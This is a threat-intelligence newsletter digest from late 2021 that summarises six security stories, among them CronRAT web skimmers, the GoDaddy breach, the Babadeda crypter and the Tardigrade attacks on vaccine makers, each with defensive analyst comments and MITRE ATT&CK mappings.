Anomali Cyber Watch: Web Skimmers Victimize Holiday Shoppers, Tardigrade Targets Vaccine Manufacturers, Babadeda Crypter Targets Crypto Community, and More

<p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>Data breach, Stealthy malware, Vulnerabilities</b> and <b>Web skimmers</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p> <p><img src="https://cdn.filestackcontent.com/dAG59TxHT7KTYiHBLsmZ"/><br/> <em>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</em></p> <h2>Trending Cyber News and Threat Intelligence</h2> <div lass="trending-threat-article"> <h3 id="article-1"><a href="https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html" target="_blank">Micropatching Unpatched Local Privilege Escalation in Mobile Device Management Service (CVE-2021-24084 / 0day)</a></h3> <p>(published: November 26, 2021)</p> <p>0patch Team released free, unofficial patches to protect Windows 10 users from a local privilege escalation (LPE) zero-day vulnerability in the Mobile Device Management Service. The security flaw resides under the "Access work or school" settings, and it bypasses a patch released by Microsoft in February to address an information disclosure vulnerability tracked as CVE-2021-24084. Security researcher Abdelhamid Naceri discovered this month that the incompletely-patched flaw could also be exploited to gain admin privileges after publicly disclosing the newly-spotted bug in June. He also published a proof of concept (POC) for a related vulnerability in Windows 11.<br/> <b>Analyst Comment:</b> Check if your Windows 10 version is affected and if so, apply the appropriate free micropatches. Plan to patch your Windows 11 systems when security patches become available. As actors now have a POC for the Windows 11 privilege escalation vulnerability, it is important to harden your systems to avoid the initial access.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947233" target="_blank">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation - T1068</a><br/> <b>Tags:</b> CVE-2021-24084, Vulnerability, Micropatching, Privilege escalation, LPE, Administrative access, Zero-day, Windows, Windows 10, Windows 11</p> </div> <div lass="trending-threat-article"> <h3 id="article-1"><a href="https://sansec.io/research/cronrat" target="_blank">CronRAT Malware Hides Behind February 31st</a></h3> <p>(published: November 24, 2021)</p> <p>Sansec researchers have discovered CronRAT, a new remote access trojan (RAT), that is capable of stealing payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. By modifying the server-side code it bypasses browser-based security solutions. CronRAT actors engage in Magecart attacks achieving additional stealthiness thanks to the Linux Cron Job system. CronRAT code is compressed, Base64-encoded and hidden in the task names in the calendar subsystem of Linux servers (“cron”). To avoid system administrators’ attention and execution errors, those tasks are scheduled on a nonexistent day (such as February 31st). Other CronRAT stealthiness techniques are: anti-tampering checksums, being controlled via binary/obfuscated protocol, control server disguised as Dropbear SSH service, fileless execution, launching tandem RAT in a separate Linux subsystem, and timing modulation.<br/> <b>Analyst Comment:</b> Websites, much like personal workstations, require constant maintenance and upkeep in order to adapt to the latest threats. All external facing assets should be monitored and scanned for vulnerabilities. Threats like CronRAT make it critical that server software is kept up to date. The ability to easily restore from backup, incident response planning, and customer communication channels should all be established before a breach occurs. In addition, supply chain attacks are becoming more frequent amongst threat actors as their Tactics, Techniques, and Procedures (TTPs) evolve. Therefore, it is paramount that all applications in use by your company are properly maintained and monitored for potential unusual activity.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947127" target="_blank">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947235" target="_blank">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947136" target="_blank">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/947194" target="_blank">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a><br/> <b>Tags:</b> CronRAT, Linux, Magecart, Server-side, Cron job, Stealthiness, Dropbear SSH</p> </div> <div lass="trending-threat-article"> <h3 id="article-1"><a href="https://threatpost.com/godaddy-breach-widens-reseller-subsidiaries/176575/" target="_blank">GoDaddy Breach Widens to Include Reseller Subsidiaries</a></h3> <p>(published: November 24, 2021)</p> <p>The GoDaddy breach affecting 1.2 million customers has widened to include subsidiaries that resell GoDaddy's Managed WordPress hosting environment. The affected companies are, Domain Factory, Heart Internet, Host Europe, Media Temple, tsoHost, and 123Reg. GoDaddy confirmed that several of these brands' customers were affected by the security incident. The breach that affected Goddaddy and resellers opened up information on both email addresses and customer numbers, as well as the original WordPress admin password created when the service was first installed. Additionally, active customers had their Secure-Socket Layer (SSL) private key and sFTP and database usernames and passwords exposed.<br/> <b>Analyst Comment:</b> GoDaddy is currently reissuing and installing new certificates for affected GoDaddy's Managed WordPress hosting environment customers. It is important to follow secure password practices, and avoid storing customer passwords in a clear text.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947231" target="_blank">[MITRE ATT&amp;CK] Valid Accounts - T1078</a><br/> <b>Tags:</b> GoDaddy, WordPress, 123Reg, Domain Factory, Heart Internet, Host Europe, Media Temple, tsoHost, Breach</p> </div> <div lass="trending-threat-article"> <h3 id="article-1"><a href="https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities" target="_blank">The BABADEDA Crypter - an Emerging Crypter Targeting the Crypto, NFT, and DeFi Communities</a></h3> <p>(published: November 23, 2021)</p> <p>Morphisec Labs researchers have discovered a new malware campaign on Discord that uses the Babadeda crypter to hide malware which targets the crypto communities for NFT and DeFi. Since May 2021, Babadeda has been used in a variety of campaigns to deliver information stealers, Remote Access Trojans (RATs), and even LockBit ransomware. In this specific campaign, Babadeda was observed dropping Remcos and BitRAT. The actors use decoy sites on typosquatted domains with a valid LetsEncrypt certificate to deliver the malware. Babadeda is able to bypass signature-based antivirus solutions during the malware execution through avoiding highly-monitored VirtualAlloc and VirtualProtect functions by configuring the executable .text section’s characteristics to RWE (Read-Write-Execute). At different stages, the actor embeds the malicious code inside different legitimate codes in order to confuse analysts, obfuscate its real intentions, and make it harder for antivirus solutions to detect.<br/> <b>Analyst Comment:</b> Fortunately, even with the observed evasion techniques and low detection levels, the researchers have been able to both see and stop Babadeda. Educate users on phishing threats, block known indicators of compromise (IoCs) via Anomali Match, use Morphisec’s Yara signatures detecting Babadeda, and try trapping crypter deployment by a tool morphing process memory.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947136" target="_blank">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/947127" target="_blank">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] Credentials from Password Stores - T1555</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a><br/> <b>Tags:</b> Babadeda, Remcos, BitRAT, Amadey, CryptBot, Ursnif, SmokeLoader, Information stealer, RAT, LockBit, FickerStealer, Metasploit, QuasarRAT, Ransomware, Cryptocurrency, NFT, DeFi, Typosquatting, Evasion</p> </div> <div lass="trending-threat-article"> <h3 id="article-1"><a href="https://www.ncsc.gov.uk/news/guidance-for-retailers-to-prevent-websites-becoming-black-friday-cyber-traps" target="_blank">Guidance for Retailers to Prevent Websites Becoming Black Friday Cyber Traps</a></h3> <p>(published: November 22, 2021)</p> <p>The UK’s National Cyber Security Centre (NCSC) has issued a warning to small online shops to be aware of card skimmers in the run-up to Black Friday. The NCSC has identified 4,151 compromised online shops up to the end of September. The skimmers are bits of malicious software that are injected into legitimate websites so they can steal shoppers’ credit card details. The longer that cybercriminals can keep their card skimming on a website before its customers or owners notice, the more money they could make, and ensure to be as unobtrusive as possible. While Magento e-commerce platform is highly targeted due to its popularity, other platforms with known vulnerabilities are targeted as well.<br/> <b>Analyst Comment:</b> No business is too small to be compromised by cyber threat actors. Keep your website software up to date. Adhere to secure administration and password practices. Better protection can be achieved by a Web Application Firewall (WAF), a subresource integrity, and/or a third-party integrity monitoring service.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947138" target="_blank">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947243" target="_blank">[MITRE ATT&amp;CK] Input Capture - T1056</a><br/> <b>Tags:</b> Web skimmers, Credit card, Skimming, Online shopping, Website compromise</p> </div> <div lass="trending-threat-article"> <h3 id="article-1"><a href="https://www.isac.bio/post/tardigrade" target="_blank">Tardigrade: An APT Attack on Vaccine Manufacturing Infrastructure</a></h3> <p>(published: November 22, 2021)</p> <p>The advanced persistent threat (APT) group, Tardigrade, has been targeting biomanufacturing facilities and research centers working on vaccines and critical medicines since at least January 2020, according to the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC). The group has been using a variant of a sophisticated custom malware, called SmokeLoader, to spread in compromised networks and exfiltrate data for extensive periods of time without being noticed. The variant is particularly interesting in the sense that it can recompile the loader from memory without leaving a consistent signature. This makes it more difficult to identify, trace, and remove. SmokeLoader acts as a stealthy entrance point for the actors, downloading more payloads, manipulating files, and deploying additional modules. The actors were seen deploying ransomware for the purpose of masking their information-stealing activity.<br/> <b>Analyst Comment:</b> Ensure that policies are in place to defend your network. Aggressively segment machines using outdated operating systems and accelerate upgrade timelines. Use antivirus with behavioral analysis capabilities. Educational policies are also very important, provide anti-phishing training and perform offline backups.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947094" target="_blank">[MITRE ATT&amp;CK] External Remote Services - T1133</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/947137" target="_blank">[MITRE ATT&amp;CK] Supply Chain Compromise - T1195</a> | <a href="https://ui.threatstream.com/ttp/947220" target="_blank">[MITRE ATT&amp;CK] Trusted Relationship - T1199</a> | <a href="https://ui.threatstream.com/ttp/947231" target="_blank">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/3905086" target="_blank">[MITRE ATT&amp;CK] Inter-Process Communication - T1559</a> | <a href="https://ui.threatstream.com/ttp/3905040" target="_blank">[MITRE ATT&amp;CK] Create or Modify System Process - T1543</a> | <a href="https://ui.threatstream.com/ttp/947166" target="_blank">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/3905776" target="_blank">[MITRE ATT&amp;CK] Hide Artifacts - T1564</a> | <a href="https://ui.threatstream.com/ttp/2402543" target="_blank">[MITRE ATT&amp;CK] Virtualization/Sandbox Evasion - T1497</a> | <a href="https://ui.threatstream.com/ttp/3904494" target="_blank">[MITRE ATT&amp;CK] Exfiltration Over C2 Channel - T1041</a><br/> <b>Tags:</b> Tardigrade, APT, SmokeLoader, Vaccine, Cobalt Strike, Conti, Ryuk, Ransomware, Espionage, Medical, COVID-19</p> </div>